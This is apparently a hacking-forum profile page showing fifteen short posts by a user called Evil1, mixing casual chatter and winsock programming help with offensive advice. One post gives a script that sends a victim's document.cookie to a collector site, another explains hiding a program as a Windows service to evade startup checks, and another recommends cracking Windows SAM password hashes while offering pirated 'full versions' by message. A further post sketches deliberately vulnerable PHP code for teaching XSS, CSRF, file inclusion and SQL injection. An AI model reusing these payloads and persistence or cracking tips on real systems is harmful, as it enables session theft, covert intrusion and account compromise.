Evil1

Members
  • Content count

    117
  • Joined

  • Last visited

Community Reputation

0 Neutral

About Evil1

  • Rank
    elite

Contact Methods

  • AIM
    hempknight666420
  • Website URL
    http://
  • ICQ
    0

Profile Information

  • Location
    Uranius (heh heh)
  1. Go on bugtraq or security focus, pick any package available and it will show you which packages have exploits in them, then go to the software's home page (example source forge) and download the older version. It should contain the live vulnerable web app for the hacking / teaching. The only pitfall is either finding a vulnerable software package to download, or not enough info about the vulnerability. You could just write a quick guestbook app in php that doesn't run user input through htmlspecialchars() to demonstrate XSS, add a function to add users to demonstrate CSRF, add the following line of code to demonstrate Remote file Includes: <?php inlcude(GLOBAL['setupdir'] ".php"); // requires register globals to be enabled ?> To show off SQL injection, you could give your guestbook app some mysql interaction, say...the post id of the guest book, and grab the post id from a GET variable to demonstrate SQL injection. Either scenario you choose works, but I like live applications better.
  2. I didn't know you still posted here dual.
  3. Way to feed the bottom feeding script kiddy community with this one iron geek. you make me sick.
  4. dll injection perhaps, but im liking the null system driver idea. Driver == Full kernel control. Direct kernel object manipulation. You dont even have to worry about start up. Drivers are loaded on boot anyways.
  5. Here, this article explains what im talking about: http://www.tacktech.com/display.cfm?ttid=197
  6. Hes right, this is a cookie collector code snippet. To use this bad boy, just use some javascript. <script>window.open("sitewithcookiecollector.com/cookie.php?c=" + document.cookie)</script> Load that script into some place that allows scripot tags, and just lets the collector do the rest. Then all you gotta do is polug and play.
  7. register the app as a service. Then start that service in the registry. Even if they look in the startup dir, or regkey, they wont find your prog.
  8. use geo-location software. If they are from africa, they shouldn't be able to goto the site
  9. I've said this in past posts. The best windows password cracker is Sam Inside. You need both the sam file, and the system file (for the syskey encryption table). The emo version comes with a handy commandline tool that will get the syskey file from the system file. The system file is like 8 meg at best, and the syskey file is no more than 16k. The demo isnt bad, but the full version is better. message me for the full version. If you dont want to crack anything, get ahold of passware winkey. Its a bootable CD that skips all the BS and resets the admin password. Once again, theres a demo version (for use with just plain windows) and the enterprise version. I like the enterprise version for Its windows network and active directory recovery support. And once again, just message me for that version.
  10. wait, logic as in phx2600 logic?
  11. Before all the penguin people try to turn the newbies into linux heads, Let me say something. There is nothing wrong with windows. Exploits and such are found on it all the time. You dont need linux to be a "uber 1337 h4x0r". Open source aint shit if you dont understand whats going on. Try getting deep into windows.
  12. damn ponyboy, forget your passwd here too?
  13. its called winsock. winsock can interact with bsd sockets. Devcpp can support winsock. Be sure to include the header file ws_32.h winsock and winsock2.h are kind of deprecated. This site here has some great winsock tutorials and examples: http://tangentsoft.net/wskfaq/ If you encounter any problems with devcpp such as linker errors, do the following: goto project options, then select the tab paramaters. Then click the button "add library or object". Now surf over to your /devcpp/lib/ directory and select the file libws2_32.a. That should do it.
  14. <flame / rant> exploits....they're not point and click ware. They come uncompilled to keep kiddies from using them. They are typically written in C, or perl, but i've seen many in php. If you dont know how to compile, then you shouldnt be messing with exploits in the first place. </flame / rant>
  15. Does anyone know of any good books on windows device driver development?